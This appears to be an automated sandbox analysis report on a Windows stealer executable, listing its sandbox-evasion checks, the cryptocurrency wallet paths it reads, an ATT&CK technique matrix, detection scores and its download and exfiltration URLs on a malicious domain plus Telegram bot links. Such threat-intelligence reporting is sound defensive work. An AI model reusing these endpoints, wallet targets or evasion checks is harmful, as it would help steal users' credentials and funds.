        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
        Source: dBvNa2pTbj.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
        Source: dBvNa2pTbj.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: dBvNa2pTbj.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: Binary string: \??\C:\Windows\symbols\exe\build.pdb source: dBvNa2pTbj.exe, 00000000.00000002.438636945.000000000B200000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: build.pdb source: dBvNa2pTbj.exe
        Source: Binary string: \??\C:\Windows\exe\build.pdbNw source: dBvNa2pTbj.exe, 00000000.00000003.432950977.000000000B22C000.00000004.00000800.00020000.00000000.sdmp, dBvNa2pTbj.exe, 00000000.00000002.438716448.000000000B22C000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: build.pdb\build.pdbp? source: dBvNa2pTbj.exe, 00000000.00000002.433315540.0000000000EF9000.00000004.00000010.00020000.00000000.sdmp
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeCode function: 0_2_00AE51A2 push esi; ret 0_2_00AE51C6
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeCode function: 0_2_00AE3A20 push 414182B8h; ret 0_2_00AE3A43
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeCode function: 0_2_01531C69 push esi; ret 0_2_01531C80
        Source: dBvNa2pTbj.exeStatic PE information: section name: X99^i@
        Source: dBvNa2pTbj.exeStatic PE information: section name:
        Source: dBvNa2pTbj.exeStatic PE information: 0x9BB84413 [Mon Oct 14 18:48:51 2052 UTC]
        Source: initial sampleStatic PE information: section name: X99^i@ entropy: 7.998809128626319
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exe TID: 6360Thread sleep time: -30000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exe TID: 6316Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: dBvNa2pTbj.exe, 00000000.00000002.438716448.000000000B22C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMwareCU228LNBWin32_VideoControllerS2SFSVG9VideoController120060621000000.000000-00081963009display.infMSBDA86G2ATNKPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsKGTW2FPS)^
        Source: dBvNa2pTbj.exe, 00000000.00000002.438716448.000000000B22C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeMemory allocated: page read and write | page guardJump to behavior
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeQueries volume information: C:\Users\user\Desktop\dBvNa2pTbj.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: Process Memory Space: dBvNa2pTbj.exe PID: 6272, type: MEMORYSTR
        Source: dBvNa2pTbj.exe, 00000000.00000002.434140950.0000000002EF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Electrum
        Source: dBvNa2pTbj.exe, 00000000.00000002.434140950.0000000002EF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Jaxx5
        Source: dBvNa2pTbj.exe, 00000000.00000002.434140950.0000000002EF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet
        Source: dBvNa2pTbj.exe, 00000000.00000002.434140950.0000000002EF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Ethereum\keystore
        Source: dBvNa2pTbj.exe, 00000000.00000002.434140950.0000000002EF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Exodus
        Source: dBvNa2pTbj.exe, 00000000.00000002.434140950.0000000002EF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum
        Source: dBvNa2pTbj.exe, 00000000.00000002.434140950.0000000002EF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Ethereum\keystore
        Source: Yara matchFile source: 00000000.00000002.434140950.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: dBvNa2pTbj.exe PID: 6272, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: Process Memory Space: dBvNa2pTbj.exe PID: 6272, type: MEMORYSTR
        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid Accounts121
        Windows Management Instrumentation
        Path InterceptionPath Interception1
        Masquerading
        OS Credential Dumping121
        Security Software Discovery
        Remote Services1
        Archive Collected Data
        Exfiltration Over Other Network Medium11
        Encrypted Channel
        Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
        Disable or Modify Tools
        LSASS Memory141
        Virtualization/Sandbox Evasion
        Remote Desktop Protocol1
        Data from Local System
        Exfiltration Over Bluetooth3
        Ingress Tool Transfer
        Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)141
        Virtualization/Sandbox Evasion
        Security Account Manager1
        Remote System Discovery
        SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
        Non-Application Layer Protocol
        Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)2
        Obfuscated Files or Information
        NTDS33
        System Information Discovery
        Distributed Component Object ModelInput CaptureScheduled Transfer4
        Application Layer Protocol
        SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script2
        Software Packing
        LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRc.common1
        Timestomp
        Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        dBvNa2pTbj.exe55%VirustotalBrowse
        dBvNa2pTbj.exe43%MetadefenderBrowse
        dBvNa2pTbj.exe85%ReversingLabsWin32.Trojan.Johnnie
        dBvNa2pTbj.exe100%Joe Sandbox ML
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        ipwho.is2%VirustotalBrowse
        holdmy1337.ga18%VirustotalBrowse
        SourceDetectionScannerLabelLink
        https://ipwho.is/?output=xml0%VirustotalBrowse
        https://ipwho.is/?output=xml0%Avira URL Cloudsafe
        https://holdmy1337.ga/assets/dll/x86/SQLite.Interop.dll1%VirustotalBrowse
        https://holdmy1337.ga/assets/dll/x86/SQLite.Interop.dll100%Avira URL Cloudmalware
        https://holdmy1337.ga/assets/dll/System.Data.SQLite.EF6.dll100%Avira URL Cloudmalware
        https://ipwho.is/?output=xmlx0%Avira URL Cloudsafe
        https://holdmy1337.ga/assets/dll/EntityFramework.dll100%Avira URL Cloudmalware
        https://cdn.ipwhois.io/flags/ch.svg0%Avira URL Cloudsafe
        https://ipwho.is40%Avira URL Cloudsafe
        https://ipwho.is0%Avira URL Cloudsafe
        http://holdmy1337.ga100%Avira URL Cloudmalware
        https://holdmy1337.ga40%Avira URL Cloudsafe
        https://holdmy1337.ga/loading.txt100%Avira URL Cloudmalware
        https://holdmy1337.ga100%Avira URL Cloudmalware
        https://holdmy1337.ga/ginzo.php?ownerid=100%Avira URL Cloudmalware
        https://holdmy1337.ga/assets/dll/x64/SQLite.Interop.dll0%Avira URL Cloudsafe
        https://holdmy1337.ga/assets/dll/System.Data.SQLite.Linq.dll100%Avira URL Cloudmalware
        http://ns.adobe.c/g0%URL Reputationsafe
        https://holdmy1337.ga/assets/dll/System.Data.SQLite.dll100%Avira URL Cloudmalware
        https://holdmy1337.ga/assets/dll/Ionic.Zip.dll100%Avira URL Cloudmalware
        http://ipwho.is0%Avira URL Cloudsafe
        https://holdmy1337.ga/assets/dll/EntityFramework.SqlServer.dll100%Avira URL Cloudmalware
        https://holdmy1337.gaD80%Avira URL Cloudsafe
        NameIPActiveMaliciousAntivirus DetectionReputation
        ipwho.is
        136.243.172.101
        truefalseunknown
        holdmy1337.ga
        188.114.96.3
        truetrueunknown
        NameMaliciousAntivirus DetectionReputation
        https://ipwho.is/?output=xmlfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        https://holdmy1337.ga/assets/dll/x86/SQLite.Interop.dlltrue
        • 1%, Virustotal, Browse
        • Avira URL Cloud: malware
        unknown
        https://holdmy1337.ga/assets/dll/System.Data.SQLite.EF6.dlltrue
        • Avira URL Cloud: malware
        unknown
        https://holdmy1337.ga/assets/dll/EntityFramework.dlltrue
        • Avira URL Cloud: malware
        unknown
        https://holdmy1337.ga/assets/dll/x64/SQLite.Interop.dlltrue
        • Avira URL Cloud: safe
        unknown
        https://holdmy1337.ga/assets/dll/System.Data.SQLite.Linq.dlltrue
        • Avira URL Cloud: malware
        unknown
        https://holdmy1337.ga/assets/dll/System.Data.SQLite.dlltrue
        • Avira URL Cloud: malware
        unknown
        https://holdmy1337.ga/assets/dll/Ionic.Zip.dlltrue
        • Avira URL Cloud: malware
        unknown
        https://holdmy1337.ga/assets/dll/EntityFramework.SqlServer.dlltrue
        • Avira URL Cloud: malware
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        https://t.me/ginzostealer_botdBvNa2pTbj.exe, 00000000.00000002.435874694.00000000031B7000.00000004.00000800.00020000.00000000.sdmp, dBvNa2pTbj.exe, 00000000.00000002.434140950.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp, Information.txt.0.drfalse
          high
          https://ipwho.is/?output=xmlxdBvNa2pTbj.exe, 00000000.00000002.435806523.0000000003173000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://t.me/holdthismoneybotdBvNa2pTbj.exe, 00000000.00000002.435874694.00000000031B7000.00000004.00000800.00020000.00000000.sdmp, dBvNa2pTbj.exe, 00000000.00000002.434140950.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp, Information.txt.0.drfalse
            high
            https://cdn.ipwhois.io/flags/ch.svgdBvNa2pTbj.exe, 00000000.00000002.435874694.00000000031B7000.00000004.00000800.00020000.00000000.sdmp, dBvNa2pTbj.exe, 00000000.00000002.435855400.0000000003197000.00000004.00000800.00020000.00000000.sdmp, dBvNa2pTbj.exe, 00000000.00000002.434661304.0000000002FB6000.00000004.00000800.00020000.00000000.sdmp, dBvNa2pTbj.exe, 00000000.00000002.435866825.00000000031A7000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://ipwho.is4dBvNa2pTbj.exe, 00000000.00000002.435806523.0000000003173000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://ipwho.isdBvNa2pTbj.exe, 00000000.00000002.435806523.0000000003173000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://holdmy1337.gadBvNa2pTbj.exe, 00000000.00000002.434452190.0000000002F66000.00000004.00000800.00020000.00000000.sdmptrue
            • Avira URL Cloud: malware
            unknown
            https://holdmy1337.ga4dBvNa2pTbj.exe, 00000000.00000002.434389970.0000000002F53000.00000004.00000800.00020000.00000000.sdmptrue
            • Avira URL Cloud: safe
            unknown
            https://holdmy1337.ga/loading.txtdBvNa2pTbj.exe, 00000000.00000002.434140950.0000000002EF5000.00000004.00000800.00020000.00000000.sdmptrue
            • Avira URL Cloud: malware
            unknown
            https://holdmy1337.gadBvNa2pTbj.exe, 00000000.00000002.434389970.0000000002F53000.00000004.00000800.00020000.00000000.sdmptrue
            • Avira URL Cloud: malware
            unknown
            https://holdmy1337.ga/ginzo.php?ownerid=dBvNa2pTbj.exe, 00000000.00000002.434140950.0000000002EF5000.00000004.00000800.00020000.00000000.sdmptrue
            • Avira URL Cloud: malware
            unknown
            http://ns.adobe.c/gdBvNa2pTbj.exe, 00000000.00000003.433033972.000000000155C000.00000004.00000020.00020000.00000000.sdmp, dBvNa2pTbj.exe, 00000000.00000002.433983096.000000000155D000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namedBvNa2pTbj.exe, 00000000.00000002.434389970.0000000002F53000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              http://ipwho.isdBvNa2pTbj.exe, 00000000.00000002.435806523.0000000003173000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://holdmy1337.gaD8dBvNa2pTbj.exe, 00000000.00000002.434619814.0000000002F86000.00000004.00000800.00020000.00000000.sdmp, dBvNa2pTbj.exe, 00000000.00000002.434842882.0000000002FD2000.00000004.00000800.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              unknown
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              136.243.172.101
              ipwho.isGermany
              24940HETZNER-ASDEfalse
              188.114.96.3
              holdmy1337.gaEuropean Union
              13335CLOUDFLARENETUStrue
              IP
              192.168.2.1
              Joe Sandbox Version:35.0.0 Citrine
              Analysis ID:662346
              Start date and time: 13/07/202206:19:392022-07-13 06:19:39 +02:00
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 6m 48s
              Hypervisor based Inspection enabled:false
              Report type:full
              Sample file name:dBvNa2pTbj (renamed file extension from none to exe)
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
              Number of analysed new started processes analysed:23
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Detection:MAL
              Classification:mal92.troj.spyw.evad.winEXE@1/15@2/3
              EGA Information:
              • Successful, ratio: 100%
              HDC Information:
              • Successful, ratio: 1.5% (good quality ratio 0.9%)
              • Quality average: 40.7%
              • Quality standard deviation: 35.1%
              HCA Information:
              • Successful, ratio: 96%
              • Number of executed functions: 58
              • Number of non-executed functions: 28
              Cookbook Comments:
              • Adjust boot time
              • Enable AMSI
              • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, UpdateNotificationMgr.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe, UsoClient.exe, wuapihost.exe
              • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, settings-win.data.microsoft.com, ctldl.windowsupdate.com, arc.msn.com, ris.api.iris.microsoft.com, licensing.mp.microsoft.com, go.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net
              • Not all processes where analyzed, report is missing behavior information
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              TimeTypeDescription
              06:20:53API Interceptor1x Sleep call for process: dBvNa2pTbj.exe modified
              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              136.243.172.101fg.exeGet hashmaliciousBrowse
              • ipwho.is/
              1cuFmm3Fj8.exeGet hashmaliciousBrowse
              • ipwhois.app/xml/
              YJZvfY0Wn4.exeGet hashmaliciousBrowse
              • ipwhois.app/xml/
              JP9XyWB6dd.exeGet hashmaliciousBrowse
              • ipwhois.app/xml/
              kNLo5bC511.exeGet hashmaliciousBrowse
              • ipwhois.app/xml/
              FFwW4V92Z7.exeGet hashmaliciousBrowse
              • ipwhois.app/xml/
              6NABK7LZ8s.exeGet hashmaliciousBrowse
              • ipwhois.app/xml/
              63071203.exeGet hashmaliciousBrowse
              • ipwhois.app/json/102.129.143.93
              eufive_20220307-121755.exeGet hashmaliciousBrowse
              • ipwhois.app/xml/
              eufive_20220304-191420(1).exeGet hashmaliciousBrowse
              • ipwhois.app/xml/
              PNGS4qzFwI.exeGet hashmaliciousBrowse
              • ipwhois.app/xml/
              NitroGenerator.exeGet hashmaliciousBrowse
              • ipwhois.app/json/102.129.143.61
              repair inject.exeGet hashmaliciousBrowse
              • ipwhois.app/json/102.129.143.61
              7TIOTyD8o4.exeGet hashmaliciousBrowse
              • ipwhois.app/json/102.129.143.61
              2d.exeGet hashmaliciousBrowse
              • ipwhois.app/xml/
              vUscUtP.exeGet hashmaliciousBrowse
              • ipwhois.app/json/102.129.143.61
              WbqTuCZuc9.exeGet hashmaliciousBrowse
              • ipwhois.app/xml/
              ldzOTRmAmT.exeGet hashmaliciousBrowse
              • ipwhois.app/json/102.129.143.61
              O33SMit0U1.exeGet hashmaliciousBrowse
              • ipwhois.app/json/102.129.143.61
              ZDiO12EFG9.exeGet hashmaliciousBrowse
              • ipwhois.app/json/102.129.143.61
              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              holdmy1337.gaxOoyjLMVjE.exeGet hashmaliciousBrowse
              • 188.114.97.3
              build.exeGet hashmaliciousBrowse
              • 188.114.96.3
              build.exeGet hashmaliciousBrowse
              • 188.114.96.3
              ipwho.isxOoyjLMVjE.exeGet hashmaliciousBrowse
              • 136.243.172.101
              sSra27WE9o.exeGet hashmaliciousBrowse
              • 136.243.172.101
              sSra27WE9o.exeGet hashmaliciousBrowse
              • 136.243.172.101
              fg.exeGet hashmaliciousBrowse
              • 136.243.172.101
              KEY STROKES.exeGet hashmaliciousBrowse
              • 136.243.172.101
              er6n39LUvi.exeGet hashmaliciousBrowse
              • 136.243.172.101
              build.exeGet hashmaliciousBrowse
              • 136.243.172.101
              Akrien Crack 7.4.exeGet hashmaliciousBrowse
              • 136.243.172.101
              Nitro Gen And Check.exeGet hashmaliciousBrowse
              • 136.243.172.101
              build.exeGet hashmaliciousBrowse
              • 136.243.172.101
              build.exeGet hashmaliciousBrowse
              • 136.243.172.101
              build.exeGet hashmaliciousBrowse
              • 136.243.172.101
              build.exeGet hashmaliciousBrowse
              • 136.243.172.101
              build.exeGet hashmaliciousBrowse
              • 136.243.172.101
              new project 1.exe.exeGet hashmaliciousBrowse
              • 136.243.172.101
              build.exeGet hashmaliciousBrowse
              • 136.243.172.101
              build.exeGet hashmaliciousBrowse
              • 136.243.172.101
              SecuriteInfo.com.Variant.Lazy.173867.17498.exeGet hashmaliciousBrowse
              • 136.243.172.101
              build.exeGet hashmaliciousBrowse
              • 136.243.172.101
              build.exeGet hashmaliciousBrowse
              • 136.243.172.101
              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              CLOUDFLARENETUSxOoyjLMVjE.exeGet hashmaliciousBrowse
              • 188.114.97.3
              Payment Invoice..ShtmlGet hashmaliciousBrowse
              • 188.114.96.3
              CkWJfCDAeO.exeGet hashmaliciousBrowse
              • 104.20.67.143
              https://newitventure.com/.tmb/src/NTFX/neten/Get hashmaliciousBrowse
              • 104.17.25.14
              DocuSign for Business document_ 16V4385100.msgGet hashmaliciousBrowse
              • 104.21.54.42
              R6NX4p7diT.exeGet hashmaliciousBrowse
              • 162.159.135.233
              #U043e#U0440#U043a#U043e#U0441#U0442#U0430#U043d#U0432#U0440#U0430#U0431#U043e#U0442#U0435.xlsxGet hashmaliciousBrowse
              • 104.18.42.171
              Tsunami.x86Get hashmaliciousBrowse
              • 172.68.102.187
              Tsunami.arm7Get hashmaliciousBrowse
              • 172.68.212.83
              orkostansocialclubfrom09.06.xlsxGet hashmaliciousBrowse
              • 172.64.145.85
              #U260e#Ufe0fAudio-0410860479.mp4 - 90905531762049856.htmGet hashmaliciousBrowse
              • 104.17.24.14
              #U266c voice0989876_3-2(3).hTmGet hashmaliciousBrowse
              • 104.17.25.14
              The Coeur Group_Invoice.htmGet hashmaliciousBrowse
              • 104.16.149.64
              https://www.menti.com/8jzk2vh115Get hashmaliciousBrowse
              • 104.18.3.4
              INQUIRYORDER.exeGet hashmaliciousBrowse
              • 172.67.158.167
              https://r20.rs6.net/tn.jsp?t=3Dqcuzd54ab.0.0.sqy9yutab.0&1d=preview&r=3&p=https://gxUJvvMsI.venturapower.in/?e=jean.robitaille@agnicoeagle.comGet hashmaliciousBrowse
              • 104.17.25.14
              cmd.cmdGet hashmaliciousBrowse
              • 172.67.218.221
              NitroGen By MaskeZen.exeGet hashmaliciousBrowse
              • 162.159.135.232
              https://dev-operationstechnology.pantheonsite.io/otspec/Get hashmaliciousBrowse
              • 104.18.10.207
              88nNT0x2j8.exeGet hashmaliciousBrowse
              • 104.16.155.36
              HETZNER-ASDExOoyjLMVjE.exeGet hashmaliciousBrowse
              • 136.243.172.101
              https://secured-office2345612.webador.com/Get hashmaliciousBrowse
              • 116.203.11.150
